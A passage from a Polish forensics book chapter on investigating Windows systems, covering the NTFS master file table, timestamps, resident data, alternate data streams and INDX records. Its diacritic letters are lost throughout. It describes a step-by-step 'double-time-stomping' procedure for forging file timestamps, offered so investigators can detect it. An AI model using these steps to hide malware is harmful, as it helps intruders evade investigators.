w ten sposb?
4. Kierownik z innego biura informuje Ci, e nastpnego dnia powinien przyj kurier
z obrazem dysku. Twoim zadaniem jest odzyskanie usunitych plikw. Jakie pytania zadasz,
zanim obraz do Ciebie dotrze? Dlaczego?
ROZDZIA 12.
Prowadzenie czynnoci
ledczych w systemach
Windows
W
tym rozdziale opisujemy podstawowe rda materiau dowodowego w systemach
Windows oraz pokazujemy, jak je wykorzysta do szukania odpowiedzi na typowe
pytania powstajce podczas ledztw. Mwic szczerze, prowadzenie operacji w systemie
Windows jest bardzo trudne. System ten jest niezwykle skomplikowany, a kiedy stanowi element
domeny Active Directory, co bardzo czsto zdarza si w rodowiskach korporacyjnych, trudnoci si
mno. Sama ilo plikw, kluczy rejestru, wpisw w dziennikach i innych ladw generowanych
przez system w trakcie normalnej codziennej dziaalnoci moe przytoczy niejednego analityka.
Na szczcie informatyka ledcza i metody reakcji na incydenty bezpieczestwa komputerowego
bardzo si rozwiny w ostatnich latach, dziki czemu mamy do dyspozycji wiele przydatnych
narzdzi. W efekcie gromadzenie i analizowanie informacji z rnych rde systemowych jest
o wiele atwiejsze ni kiedy. Mimo to, czsto spotykamy mao dowiadczonych analitykw, ktrzy
nadmiernie polegaj na interpretacji dowodw bez dogbnej wiedzy na temat ich pochodzenia lub
sposobu dziaania. Poza tym narzdzia mog zawiera bdy oraz przedstawia niekompletne bd
mylnie sformatowane dane. Moe to by przyczyn wycignicia nieprawidowych wnioskw
dotyczcych dziaalnoci intruza w systemie albo, co gorsza, spowodowa, e co przeoczymy
lub cakiem le zinterpretujemy. adne narzdzie nie moe zastpi dogbnej wiedzy na temat
wewntrznych mechanizmw dziaania systemu Windows. Chcielibymy, aby wykorzysta
wiadomoci zawarte w tym rozdziale w swojej pracy oraz do dalszego poszerzania wiedzy.
Rozdzia ten podzielilimy na kilka czci powiconych rnych rdom materiau
dowodowego. Nie opisalimy wszystkich cech systemu operacyjnego, lecz skupilimy si na tych
obszarach, ktre s najbardziej przydatne podczas ledztw. Oto one:
analiza systemu plikw,
pobieranie zasobw z wyprzedzeniem w systemie Windows,
dzienniki zdarze,
zadania zaplanowane,
rejestr,
inne artefakty interaktywnych sesji,
analiza zawartoci pamici,
alternatywne trwae magazyny danych.
W kadej sekcji opisujemy, jak dany dowd dziaa (tzn. jaka jest jego rola w systemie
operacyjnym), co naley pobra w ramach procesu zbierania materiau dowodowego oraz jak ten
materia przeanalizowa lub zinterpretowa (podpowiadamy te, jakich narzdzi mona uy).
Ponadto dla kadego rodzaju dowodw przedstawiamy typowe sytuacje, jakie maj miejsce
podczas prowadzenia ledztw, oraz wskazujemy, jaki wpyw na nie ma zachowanie hakera.
Na kocu rozdziau zamiecilimy podsumowanie wiadomoci o wszystkich opisanych
artefaktach systemu Windows.
ROZDZIA 12. PROWADZENIE CZYNNOCI LEDCZYCH W SYSTEMACH WINDOWS 291
Uwaga W czasie pisania tej ksiki system Windows 8 nie by jeszcze popularny w rodowiskach korporacyjnych.
W praktyce w wielu organizacjach dopiero niedawno zaczto uywa najnowszej wersji systemu
Windows 7. Dlatego w rozdziale tym nie opisujemy artefaktw ani zmian wprowadzonych w systemie
Windows 8 ani nowszych jego wersjach. W wikszoci przypadkw aktualizacje systemu Windows
nie powoduj powanych zmian, jeli chodzi o dostpno rnych artefaktw, cho oczywicie
niektre zmieniy lokalizacj i pojawio si troch nowych. Na stronie internetowej tej ksiki
planujemy publikowa informacje o nowociach, ktre pojawiy si w systemie Windows 8.
ANALIZA SYSTEMU PLIKW

System plikw systemu Windows stanowi rdo wielu rodzajw ladw, o ktrych jest mowa
w tym rozdziale. Aktualnie we wszystkich wersjach systemu Windows najczciej spotyka si system
plikw NTFS (ang. NT File System). Zosta on utworzony przez firm Microsoft na pocztku lat 90.
ubiegego wieku, a do powszechnego uytku wszed w czasach systemw Windows 2000 i XP,
zastpujc stary system FAT wykorzystywany przez Microsoft Disk Operating System (MS-DOS).
Poniewa aktualnie trudno natkn si na inny system plikw ni NTFS, zwaszcza na woluminach
dyskowych zawierajcych system operacyjny Windows, w rozdziale tym opisujemy tylko ten.
Zaczniemy od krtkiego wprowadzenia do najwaniejszych rde artefaktw w NTFS, czyli
gwnej tabeli plikw (ang. Master File Table MFT) i zwizanych z ni metadanych, atrybutw
INDX oraz dziennikw zmian. Ponadto opisujemy kilka oglnych zagadnie dotyczcych systemw
plikw, ktrych znajomo jest niezbdna kademu ledczemu, takich jak np. tworzenie kopii
zapasowych woluminw w tle i przekierowania systemu plikw.
Gwna tabela plikw

Zadaniem systemu NTFS, tak jak kadego systemu plikw, jest zarzdzanie alokacj i sposobem
wykorzystania przestrzeni dyskowej, nadzorowanie tworzenia i usuwania plikw oraz obsugiwanie
metadanych zwizanych z tymi plikami. Kady, kto kiedykolwiek wykonywa analizy na wyczonych
dyskach, pewnie wie, jak znale plikowe znaczniki czasu i zidentyfikowa usunite pliki, ktre
dadz si jeszcze przywrci jest to moliwe z pomoc artefaktw NTFS, ktre mona pobiera
i analizowa, jak kade inne rdo dowodw w systemie Windows.
Gwna tabela plikw (MFT) jest w systemie NTFS podstawowym rdem metadanych.
Zawiera lub wskazuje w sposb poredni wszystkie informacje o pliku: znaczniki czasu, rozmiar
w bajtach, atrybuty (np. uprawnienia dostpu), katalog nadrzdny i zawarto. Innymi sowy,
jeli masz kopi MFT z systemu Windows, to masz katalog wszystkich plikw, jakie znajduj si
na woluminie jak rwnie niektrych niedawno usunitych (zaraz rozwiniemy t myl).
Dowody
Kady wolumin NTFS zawiera wasn tabel MFT, ktra jest przechowywana w katalogu gwnym
woluminu pod nazw $MFT. Jeli trzeba przeanalizowa zawarto systemu z wieloma partycjami lub
dyskami, naley pobra tabele MFT z wszystkich woluminw nigdy nie wiadomo, co moe si przyda.
Pliki z metadanymi NTFS, takie jak $MFT, s niedostpne z poziomu Eksploratora Windows i innych
aplikacji wykorzystujcych standardowy interfejs API dostpu do plikw. Aby si do nich dosta
i przejrze ich tre, potrzebny jest dostp do surowego dysku, jaki zapewniaj np. narzdzia
do analizy ledczej i sterowniki.
W standardowym dysku twardym z 512-bajtowymi sektorami tabela MFT ma posta serii
1024-bajtowych rekordw, zwanych rwnie wpisami po jednym dla kadego pliku i katalogu
w woluminie. Pierwszych 16 wpisw MFT jest zarezerwowanych dla podstawowych artefaktw
NTFS, wcznie z samym plikiem $MFT, $LogFile i innymi specjalnymi plikami, o ktrych bdzie
mowa dalej w tym podrozdziale. Kady wpis zawiera metadane i atrybuty opisujce plik lub
katalog i wskazujce fizyczne miejsce jego przechowywania na dysku. Oto najwaniejsze pola
rekordu MFT.
Typ rekordu okrela, czy dany rekord reprezentuje plik, czy katalog.
Numer rekordu liczba cakowita suca jako identyfikator rekordu MFT.
Numery rekordw s nadawane rosnco kolejnym dodawanym wpisom.
Numer rekordu nadrzdnego numer rekordu katalogu nadrzdnego. Kady wpis MFT
zawiera tylko numer rekordu bezporedniego elementu nadrzdnego, nie ca ciek
dyskow. ciek t mona jednak odtworzy, podajc za sekwencj tych pl kolejnych
rekordw, a do katalogu gwnego woluminu.
Znacznik aktywnoci wpisy MFT dotyczce usunitych plikw i katalogw s
oznaczone jako nieaktywne (ang. Inactive). System NTFS automatycznie odzyskuje
i zastpuje nieaktywne wpisy nowymi aktywnymi wpisami, aby zapobiec nieskoczonemu
rozrostowi tabeli MFT.
Atrybuty kady wpis MFT zawiera kilka atrybutw z metadanymi dotyczcymi pliku
mona w nich znale wszystko, od znacznikw czasu po informacj o fizycznej
lokalizacji zawartoci pliku na dysku. Trzy najwaniejsze atrybuty, o ktrych bdzie tu
mowa, to $STANDARD_INFORMATION, $FILENAME oraz $DATA.
Warto zauway, e w napdach AF (ang. Advanced Format) z 4-kilobajtowymi sektorami
kady rekord MFT ma rozmiar 4096 bajtw. Wicej informacji na ten temat mona znale
w podanych poniej artykuach.
W INTERNECIE
traceevidence.blogspot.com/2013/03/a-quick-look-at-mft-resident-data-on.html
blogs.msdn.com/b/ntdebugging/archive/2011/06/28/ntfs-and-4k-disks.aspx
Na rysunku 12.1 przedstawiono oglny schemat ukadu rekordu tabeli MFT oraz jego
najwaniejsze pola, czyli FILE_RECORD_SEGMENT_HEADER (przedstawione jako Nagwek rekordu)
oraz atrybuty $STANDARD_INFORMATION, $FILE_NAME i $DATA.
RYSUNEK 12.1. Struktura rekordu pliku MFT
Analiza tabeli MFT

Jak napisalimy wczeniej, tabela MFT to jedno z najwaniejszych rde dowodw, jakie
wykorzystujemy podczas analiz systemw plikw na potrzeby ledztwa. W tym miejscu
pokazujemy, jak pobra z tabeli MFT znaczniki czasu oraz informacje o usunitych plikach
i katalogach s to praktycznie rutynowe czynnoci w kadym ledztwie. Powicilimy te
troch miejsca na opis dwch poj dotyczcych moliwoci odzyskiwania ukrytych danych
plikowych; chodzi o rekordy rezydentne (ang. resident record) i alternatywne strumienie danych
(ang. alternate data stream ADS).
Znajdowanie usunitych plikw

Kady specjalista od informatyki ledczej wie, e usunicie pliku lub katalogu wcale nie znaczy,
e jednostka ta zostaje bezpowrotnie wymazana z dysku. Zastanowimy si, jak to jest moliwe
w systemie NTFS (oczywicie pomijajc kwesti Kosza). Wiesz ju, e kady wpis w tabeli MFT
zawiera znacznik wskazujcy, czy dany rekord jest aktywny, czy nieaktywny. Gdy uytkownik
usuwa plik lub katalog, system NTFS ustawia ten znacznik w odpowiednim rekordzie na warto
Inactive (nieaktywny) oznaczajc, e dany wpis MFT jest od tej pory dostpny do ponownego
wykorzystania. W kocu system NTFS nie byby zbyt przydatny, gdyby wpisy usunitych plikw
pozostaway nienaruszalne na zawsze tabela MFT cay czas by rosa i w kocu zajaby cay
dysk. Naley jednak podkreli, e zmiana znacznika to jedyna zmiana majca miejsce podczas
usuwania pliku jego tre pozostaje na dysku i nadal jest wskazywana przez rekord MFT
(a dokadnie przez atrybut $DATA, ktry opisalimy nieco dalej). Dopki miejsca te nie zostan
nadpisane innymi danymi, ich zawarto mona odzyska. Podobnie jest z nieaktywnymi
rekordami wpisw dopki nie zostan wykorzystane w innym celu, zawsze mona je
przywrci do uytku.
Jak dugo przechowywane s nieaktywne wpisy w tabeli MFT? To zaley od pewnych
czynnikw. Zanim system NTFS doda nowy wpis do tej tabeli, najpierw prbuje powtrnie uy
jednego z istniejcych. W efekcie nieaktywne rekordy na gwnym woluminie systemowym z reguy
przetrwaj zaledwie kilka sekund lub minut. Natomiast na innych woluminach, na ktrych system
jest mniej aktywny, rotacja jest mniejsza i rekordy s przechowywane znacznie duej.
Analiza znacznikw czasowych

Znaczniki czasu nale do najwaniejszych rodzajw metadanych, jakie s przechowywane w tabeli
MFT. Czasami analitycy ledczy mwi o czasach MACE plikw jest to skrt od czterech typw
znacznikw czasu w systemie NTFS: Modified (czas modyfikacji), Accessed (czas ostatniego uycia),
Created (czas utworzenia) oraz Entry Modified (modyfikacja wpisu). Zaraz wyjanimy, co kady
z nich znaczy.
Wpis pliku w tabeli MFT ma przynajmniej dwa zestawy atrybutw zawierajcych atrybuty
czasowe MACE. Jeden znajduje si w atrybucie Standard Information (informacje standardowe),
zwanym rwnie $SIA, STANDARD_INFORMATION lub $SI. Atrybut ten zawiera dodatkowo
rne kody identyfikacyjne, znaczniki i numery sekwencyjne wykorzystywane przez system
operacyjny. Drugi zestaw znacznikw czasu MACE znajduje si w atrybutach FileName (zwanych
rwnie FNA, FILE_NAME lub $FN). Atrybut $FN zawiera nazw pliku, jego rozmiar oraz numer
katalogu nadrzdnego.
Kady, kto oglda waciwoci jakiegokolwiek pliku w Eksploratorze Windows lub domylnym
interfejsie uytkownika jednego z popularnych narzdzi ledczych, np. EnCase, widzia te standardowe
znaczniki czasu. Dostp do nich mona uzyska przez interfejs API systemu Windows, wic s
prezentowane take w aplikacjach uytkownika systemu. Na rysunku 12.2 pokazano waciwoci
pliku cmd.exe, w ktrych wida znaczniki czasu utworzenia, modyfikacji i ostatniego uycia pliku
z atrybutu $SI. Eksplorator Windows nie pokazuje znacznika czasu modyfikacji wpisu w tabeli,
ale pokazuj go praktycznie wszystkie narzdzia ledcze, np. SleuthKit, EnCase i FTK.
RYSUNEK 12.2. Okno waciwoci pliku cmd.exe

Definicje znacznikw MACE z atrybutu $SI (ang. Standard Information) s oczywiste

(moe z wyjtkiem znacznika ostatniej modyfikacji wpisu).
Modified (zmodyfikowany) okrela dat ostatniej zmiany treci pliku.
Accessed (ostatnio uywany) okrela dat ostatniego odczytu treci pliku.
Created (utworzony) okrela dat narodzin pliku.
Entry Modified (ostatnia modyfikacja wpisu) okrela, kiedy ostatnio zosta zmieniony
wpis pliku w tabeli MFT, a nie sama tre tego pliku.
Uwaga W celu poprawienia wydajnoci systemy Windows Vista, 7, Server 2008 i nowsze nie aktualizuj ju
domylnie znacznika czasu ostatniego uycia pliku. Dziaaniem tej funkcji steruj klucz i warto
rejestru HKLM\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate. Nawet jeli
warto ta nie zostanie ustawiona, system NTFS moe opnia aktualizacj nawet o godzin.
Czym w takim razie rni si znaczniki czasu MACE atrybutu $FN od znacznikw atrybutu $SI?
Odnosz si one do wpisu w tabeli MFT dotyczcego samej nazwy pliku. Przykadowo Filename
Created (czas utworzenia nazwy pliku) oznacza dat i godzin utworzenia wpisu w tabeli MFT
dla danego pliku. Znacznik czasu Filename Modified (czas modyfikacji nazwy pliku) oznacza dat
i godzin ostatniej zmiany atrybutu pliku w tabeli MFT itd.
Jeli, tak jak autorzy tej ksiki, poznae system MS-DOS, moe pamitasz, e kiedy maksymalna
dugo nazwy pliku wynosia osiem znakw (plus trzyznakowe rozszerzenie). System NTFS
przechowuje wiele zestaww atrybutw nazw plikw pen, z rozrnianiem wielkoci liter,
oraz w standardzie systemu MS-DOS 8.3. Znaczy to, e mona zdoby cztery dodatkowe
znaczniki czasu MACE dla nazwy pliku w standardzie MS-DOS, cho z reguy s one identyczne
ze znacznikami czasu dla dugiej nazwy pliku.
Czy warto w ogle przejmowa si tymi wszystkimi znacznikami czasu? Czy jeden zestaw
atrybutw MACE nie wystarczy? Przypomnij sobie, e znaczniki czasu $SI s dostpne dla aplikacji
uytkownika systemu poprzez API Windows, tzn. e programy mog je odczytywa i zmienia na
dowolne wartoci, niekoniecznie prawidowe czynno ta nazywa si time-stomping. Narzdzia,
takie jak setmace, mog z atwoci zmieni znaczniki czasu $SI kadego pliku na dowoln warto.
Programy podrzucajce szkodliwe oprogramowanie i instalatory czsto automatycznie stosuj
ten proces w celu zmylenia ledczych, np. kopiuj znaczniki czasu z legalnych plikw systemowych
znajdujcych si w katalogu %SYSTEMROOT%, aby ich pliki si nie wyrniay oraz by
opni ledztwo.
W INTERNECIE
code.google.com/p/mft2csv/wiki/SetMACE
Na szczcie troch trudniej szpera przy znacznikach MACE atrybutu $FN. Aplikacje nie
mog ich odczytywa, jeli nie uzyskaj dostpu do samej tabeli MFT, a to wymaga dostania si
do dysku w trybie surowym (najczciej przy uyciu sterownika urzdzenia). Nie ma te sposobu
na bezporednie ustawienie lub zmodyfikowanie znacznikw czasu $FN, cho pojawia si coraz
wicej porednich metod, ktre to umoliwiaj. Przykadowo za pomoc narzdzia typu setmace
mona ustawia zarwno znaczniki atrybutw $SI, jak i $FN na dowolne wartoci, postpujc wg
poniszej procedury.
1. Zmie znaczniki czasu atrybutu Standard Information na dan warto.
2. Przenie plik do nowego katalogu w obrbie tego samego woluminu.
3. Zmodyfikuj znaczniki czasu atrybutu Standard Information pliku w nowej lokalizacji.
4. Przenie plik z powrotem do pierwotnego miejsca.
5. Ponownie zmie znaczniki czasu atrybutu Standard Information.
W efekcie otrzymasz takie same wartoci w znacznikach czasu obu atrybutw. Jak to moliwe?
Gdy plik jest przenoszony w inne miejsce na tym samym woluminie, system Windows
wykorzystuje dane ze znacznikw atrybutu $SI do ustawienia wartoci znacznikw w atrybucie
$FN dla nowego wpisu w tabeli MFT. Przywrcenie pliku z powrotem do pierwotnej lokalizacji
i ponowne zmodyfikowanie jego znacznikw czasu powoduje, e wszystkie osiem znacznikw
MACE ma tak warto, jak chcemy. Sztuczka ta czsto jest nazywana double-time-stomping.
Narzdzie setmace ma jeszcze inn funkcj umoliwiajc szperanie przy atrybutach $FN
moliwo zapisu na dysku fizycznym. W systemach Windows Vista i nowszych potrzebny jest
do tego sterownik trybu jdra. Poza tym, jak zawsze gdy bezporednio grzebie si w metadanych
systemu NTFS, trzeba liczy si z moliwoci uszkodzenia wpisu w tabeli MFT. Wikszo
hakerw posuguje si opisan wczeniej sztuczk o nazwie double-time-stomping, poniewa
jest prosta, niezawodna i nie wymaga dostpu do surowego dysku.
Cho moe si wydawa, e nie da si pozna wszystkich moliwych sztuczek stosowanych
przez hakerw do modyfikowania metadanych NTFS, nie obawiaj si! Jest kilka sposobw obrony
przed najpopularniejszymi technikami utrudniania ledztwa. Podczas analizy czasowej metadanych
NTFS zawsze zalecamy posugiwanie si znacznikami czasu $FN. Jeli haker zmieni tylko dane
$SI, to atrybuty $FN powinny zawiera prawidowe informacje MACE. Oczywicie jeli uwzgldni
si po osiem znacznikw czasu dla kadego pliku ($SI i $SN), moe by trudno przeanalizowa tak
ilo informacji. Dlatego dobrym pomysem moe by przedstawienie na osi tylko znacznikw
Filename Created i Standard Information Created. Pniej, jeli trzeba, mona doda pozostae
znaczniki MACE. Ewentualnie mona wykorzysta inne rda dowodw czasowych, o ktrych
jest mowa dalej w tym rozdziale, takie jak rejestr, pliki pobierane z wyprzedzeniem oraz wpisy
z dziennikw zdarze, aby okreli interesujce nas ramy czasowe, na jakich naley skoncentrowa
swoje czynnoci ledcze.
Na rysunku 12.3 przedstawiono przykad efektw zastosowania techniki time-stomping
z prawdziwej sprawy, ktr prowadzilimy. Instalator backdoora zmodyfikowa znaczniki czasu
$SI szkodliwego pliku DLL (rasmon.dll) tak, aby zgadzay si ze znacznikami legalnych plikw
systemowych znajdujcych si w standardowej instalacji systemu Windows. Nie zmieni jednak
znacznikw $FN (co potwierdzono za pomoc analizy innych rde informacji czasowych
w systemie).
RYSUNEK 12.3. Przykad skutkw szperania w znacznikach czasowych
Uwaga Czy kady plik, ktrego znaczniki czasu $FN nie zgadzaj si ze znacznikami czasu $SI, jest automatycznie
podejrzany? Niestety nie jest wiele legalnych moliwoci wystpienia takiej sytuacji. Przykadowo
pliki instalowane z nonikw fizycznych (np. pyt CD), wypakowywane z archiww i kopiowane z udziaw
sieciowych mog zachowa cz lub wszystkie swoje znaczniki $SI ze rda. W takich przypadkach
znaczniki czasu $FN z reguy reprezentuj prawdziwe daty i godziny utworzenia w danym systemie.
Trudno rozwika reguy stosowane przez system Windows przy aktualizacji tych atrybutw w rnych
operacjach. Organizacja SANS prowadzi przydatn cigawk dla informatykw ledczych, w ktrej
mona znale informacje na temat tego, jak najczstsze zadania systemu plikw wpywaj na znaczniki
czasu $FN i $SI. cigawk t mona znale pod adresem blogs.sans.org/computer-forensics/files/
2012/06/SANS-Digital-Forensics-andIncident-Response-Poster-2012.pdf.
Dane rezydentne
Sporo miejsca powicilimy atrybutom $FN i $SI wpisw tabeli MFT, ale naprawd jednym
z najwaniejszych atrybutw jest $DATA. Zawiera on list klastrw na dysku, w ktrych znajduje si
tre pliku. Klastry zawierajce wszystkie dane pliku nie musz by zlokalizowane obok siebie, tzn.
nie musz tworzy cigego bloku bajtw. Kiedy klastry skadajce si na plik nie tworz cigego
bloku, mwi si, e plik jest pofragmentowany. W takim przypadku atrybut $DATA zawiera list
serii danych, ktre cznie reprezentuj zawarto pliku. Mona si zastanawia, dlaczego system
NTFS stosuje t metod do przechowywania bardzo maych plikw, skoro to bardzo nieefektywne,
ale bardzo mae pliki s traktowane inaczej, jako tzw. dane rezydentne (ang. resident data).
Przypominamy, e typowy wpis w tabeli MFT ma rozmiar 1024 bajtw. Dla wikszoci plikw
jest to cakiem dua ilo miejsca, nawet jeli uwzgldni si wszystkie atrybuty, ktrych przecie
jest niemao. Dlatego w celu optymalizacji wykorzystania przestrzeni dyskowej system NTFS pliki
o rozmiarze poniej okoo 700 800 bajtw przechowuje wprost w atrybucie $DATA. Ustawia
tylko w odpowiedni sposb specjalny znacznik o nazwie Resident, ktry o tym fakcie informuje.
Innymi sowy, majc plik $MFT i znajc lokalizacj wpisu wybranego pliku o rozmiarze
nieprzekraczajcym okrelonego limitu, mona odzyska tre tego pliku bezporednio z pliku
tabeli MFT. Dotyczy to take tych plikw, ktre usunito, ale ich rekordy jeszcze nie zostay
nadpisane.
Jeeli plik jest za duy, w atrybucie $DATA zapisywana jest tylko seria klastrw; nie istnieje co
takiego jak czciowo rezydentny plik. Jednak we wpisie MFT moe za to znajdowa si wolne
miejsce zawierajce wczeniejsze dane rezydentne. Jeeli pocztkowo plik bdzie wystarczajco may,
aby zapisa jego tre w atrybucie $DATA, a nastpnie powikszy si do rozmiaru przekraczajcego
limit, zostanie on oznaczony jako nierezydentny i w atrybucie $DATA zostan zapisane informacje
o pooeniu klastrw z treci tego pliku. Natomiast pozostae wolne miejsce w tym atrybucie moe
nadal zawiera wczeniejsze dane rezydentne ze starszych wersji pliku. Analitycy czsto znajduj
lady takich danych podczas wyszukiwania acuchw na obrazach dyskw. Jeli wic kiedy
znajdziesz fragment treci pliku w pliku $MFT, bdziesz wiedzie, skd moga si tam wzi.
Alternatywne strumienie danych

Wyjanilimy, e kady wpis w tabeli MFT posiada atrybut $DATA zawierajcy tre pliku
rezydentnego lub seri klastrw, w ktrych ta tre jest przechowywana. System NTFS umoliwia
take tworzenie we wpisach MFT dodatkowych nazwanych atrybutw $DATA, czyli alternatywnych
strumieni danych (ang. Alternate Data Streams ADS). Kady z nich moe wskazywa inny zbir
serii klastrw i w ten sposb peni rol pliku doczonego do pliku gwnego. Dla ADS w rekordzie
MFT nie s tworzone osobne zbiory atrybutw Standard Information ani Filename, wic strumienie
te nie maj wasnych, osobnych znacznikw czasu MACE.
Standardowo do strumieni ADS mona odnosi si wg wzoru nazwapliku:nazwastrumienia
wikszo narzdzi ledczych w taki wanie sposb wywietla alternatywne strumienie danych
na listach plikw. Aby jak najlepiej zrozumie sposb tworzenia takich strumieni, spjrz na sekwencj
polece przedstawion na rysunku 12.4. Przykad ten ilustruje utworzenie pliku o nazwie out.txt
zawierajcego napis Witaj, wiecie oraz dodanie alternatywnego strumienia danych o nazwie
out.txt:secret.txt zawierajcego napis Jestem ADS. List plikw wywietlilimy za pomoc
polecenia dir z przecznikiem /r i bez niego. Na koniec za pomoc polecenia more
pokazalimy zawarto pliku out.txt i jego alternatywnego strumienia danych.
Dodanie alternatywnego strumienia danych do pliku out.txt nie wpyno na jego tre. Rozmiar
pozosta taki sam i gdyby obliczono skrt MD5, ten rwnie byby identyczny ze skrtem obliczonym
przed dodaniem strumienia. Zasadniczo strumienie alternatywne s podobne do osobnych plikw.
Mimo to, standardowe polecenie dir nie pozwolioby wykry strumienia out.txt:secret.txt:$DATA.
Aby go wywietli, naleaoby doda przecznik dir /r. Poza tym w celu wywietlenia treci
alternatywnego strumienia danych uywamy polecenia more (zamiast polecenia type, ktre ich
nie obsuguje).
Teraz pewnie si zastanawiasz, jak zoczycy mog wykorzysta alternatywne strumienie danych
do swoich niecnych celw. W starszych wersjach systemu Windows hakerzy stosowali strumienie
legalnych plikw i folderw do ukrywania szkodliwych plikw wykonywalnych (jest to np. jedna
z metod budowania instancji backdoora Poison Ivy). Co gorsza, pocztkowo w wierszu polece
i Eksploratorze systemu Windows nie byo adnych standardowych narzdzi pozwalajcych
wywietli list alternatywnych strumieni danych. W tamtych czasach, dopki nie dodano
odpowiednich funkcji do systemu Windows, uywao si narzdzi Streams z pakietu SysInternals
i LADS Franka Heynea.
RYSUNEK 12.4. Utworzenie i wywietlenie alternatywnego strumienia danych
Dopiero w systemie Microsoft Vista wprowadzono funkcje i mechanizmy ograniczajce

moliwoci wykorzystania alternatywnych strumieni danych do zych celw. Uniemoliwiono
bezporednie uruchamianie plikw z ADS, a przecznik /r polecenia dir powoduje wywietlenie
wszystkich dostpnych alternatywnych strumieni danych. Miej jednak wiadomo, e w ADS nadal
mona przechowywa dane moe to by wszystko, od plikw RAR po skrypty wsadowe i inny
kod interpretowany, ktry moe zosta zaadowany przez osobny plik wykonywalny.
Jeli korzystasz z jednego z popularnych narzdzi do analizy ledczej dyskw, np. Guidance EnCase,
X-Ways Forensics lub AccessData FTK, alternatywne strumienie danych znajdziesz w osobnych
wierszach, jakby byy zwykymi plikami. Przykadowo w programach EnCase 6 i 7 strumienie te s
prezentowane w formacie plikgwny.rozADS, a nie w standardzie plikgwny.roz:ADS. Jednak
wiele darmowych narzdzi (np. FTK Imager) nie wywietla strumieni ADS. Dlatego dowiedz si,
czy narzdzie, z ktrego korzystasz, wywietla alternatywne strumienie danych, czy nie.
Uwaga Alternatywne strumienie danych s w systemie Windows wykorzystywane z kilku wanych powodw.
I tak przegldarka Internet Explorer i inne przegldarki doczaj strumie o nazwie Zone.Identifier
do pobranych plikw. Eksplorator Windows pobiera z niego informacje o pochodzeniu pliku
i uywa go do wdraania odpowiednich zabezpiecze, gdy uytkownik sprbuje uruchomi ten plik.
W portalu MDN znajduje si artyku pt. Known Alternate Stream Names zawierajcy informacje
o innych alternatywnych strumieniach danych (msdn.microsoft.com/en-us/library/dn365326.aspx).
Narzdzia do analizy tabeli MFT

Wikszo komercyjnych pakietw narzdzi ledczych, wcznie z EnCase i FTK, ma moliwo
pobierania i przetwarzania zawartoci pliku $MFT i innych struktur systemu plikw NTFS. Jest te
wiele darmowych i otwartych programw, za pomoc ktrych mona analizowa takie materiay
dowodowe oto lista kilka naszych ulubionych narzdzi.
Sleuth Kit www.sleuthkit.org/sleuthkit
Kompletny otwarty pakiet narzdzi do analizowania obrazw dyskw i metadanych
systemw plikw.
mft2csv code.google.com/p/mft2csv
Zestaw narzdzi do konwertowania tabeli MFT na plik CSV i zrzucania pojedynczych
wpisw z tabeli MFT do konsoli.
analyzeMFT github.com/dkovar/analyzeMFT
Kolejne narzdzie do przetwarzania danych z tabeli MFT z moliwoci konwertowania
wpisw na format CSV oraz wykorzystujce format Sleuth Kit. Jeli zawiedzie narzdzie
mft2csv, sprbuj wanie tego (i odwrotnie).
plaso plaso.kiddaland.net
Potne narzdzie do analizy osi czasu z funkcj pobierania danych z pakietu Sleuth Kit
i wielu innych rde metadanych. Program ten ma zastpi popularne narzdzie
log2timeline.
Atrybuty INDX
Efektywny system plikw powinien szybko wyszukiwa pliki w katalogach. Przypominamy jednak,
e wpisy w tabeli MFT zawieraj tylko numery rekordw bezporednich elementw nadrzdnych.
To sprawia, e tworzenie listy zawartoci katalogu jest czasochonn operacj w najlepszym
przypadku konieczne jest znalezienie numeru rekordu katalogu, a nastpnie przejrzenie wszystkich
wpisw MFT w celu znalezienia wszystkiego, co zawiera taki sam numer rekordu nadrzdnego.
Aby przyspieszy ten proces, w NTFS wprowadzono specjalny atrybut o nazwie $INDX
(zwany te $130) przypisywany tylko katalogom. Atrybut ten zawiera drzewo B+, w ktrego
wzach rejestrowana jest zawarto danego katalogu. Przegldajc to drzewo, mona szybko
wykry zawarto katalogu i znale pliki. Rekord INDX moe by rezydentnym elementem wpisu
MFT nazywa si wwczas atrybutem INDEX_ROOT i reprezentuje wze korzenia B-drzewa.
Nierezydentne rekordy INDX nazywaj si INDEX_ALLOCATION i zawieraj podwzy opisujce
tre katalogu.
Uwaga Jeli kiedykolwiek szukae nazwy pliku w obrazie wykonanym na potrzeby ledztwa i w katalogu,
pliku $130, lub pustej przestrzeni dyskowej znalaze co z nagwkiem INDX, to natkne si
na atrybut INDX.
Po co w ogle analizowa te mao znane atrybuty INDX? Czy nie mona po prostu zidentyfikowa
zawartoci wybranego katalogu przez analiz tabeli MFT? Oczywicie mona, ale wolna przestrze
w atrybucie INDX moe zawiera dowody usunitych plikw, ktre w tabeli MFT nie s ju
zarejestrowane. Mwic konkretnie, system plikw alokuje atrybuty alokacji INDX w porcjach
po 4096 bajtw. W miar dodawania plikw do katalogu rejestr plikw atrybutu alokacji stale si
powiksza i moe urosn do rozmiaru 8192 bajtw, pniej do 12 288 bajtw itd. Co si dzieje
podczas usuwania plikw? Podwzy drzewa B+ podlegaj rwnowaeniu, ale pozostaoci starych
plikw mog przetrwa w przestrzeni wolnej atrybut alokacji nie kurczy si automatycznie.
Najwiksz zalet wpisw atrybutu INDX (take tych zlokalizowanych w przestrzeni wolnej)
jest to, e zawieraj te same metadane, co atrybut nazwy pliku w tabeli MFT, a wic:
nazw pliku,
numer rekordu katalogu nadrzdnego w MFT,
wszystkie znaczniki czasu MACE,
rozmiar fizyczny i logiczny.
Czas trwania dajcych si odzyska wpisw w przestrzeni wolnej INDX zaley od objtoci
i czstotliwoci obrotu plikami w danym katalogu. Analizujc rekordy INDX, nieraz z wielkim
powodzeniem odzyskiwalimy pozostaoci najrniejszych rodzajw plikw, od archiww RAR
z kradzionymi danymi po instalatory szkodliwego oprogramowania i inne pliki tymczasowe.
Jednak jest to moliwe tylko wtedy, gdy haker korzysta z mao uywanego katalogu. Gdy pliki
hakera s zapisywane w katalogu %TEMP% lub katalogach typu %SYSTEMROOT%, nie naley
spodziewa si wielkich sukcesw w odzyskiwaniu danych z przestrzeni wolnej INDX.
Wicej informacji na ten niewtpliwie bardzo skomplikowany temat mona znale
w doskonaym czteroczciowym artykule Williego Ballenthina i Jeffa Hamma z Mandiant
o zdobywaniu i analizowaniu rekordw INDX.
W INTERNECIE
www.mandiant.com/blog/striking-gold-incident-response-ntfs-indx-buffers-part-1-extracting-indx
Ponadto Ballenthin napisa w Pythonie bardzo przydany skrypt o nazwie INDXParse sucy
do analizowania rekordw INDX i zwracajcy dane w formacie CSV lub body.
W INTERNECIE
github.com/williballenthin/INDXParse
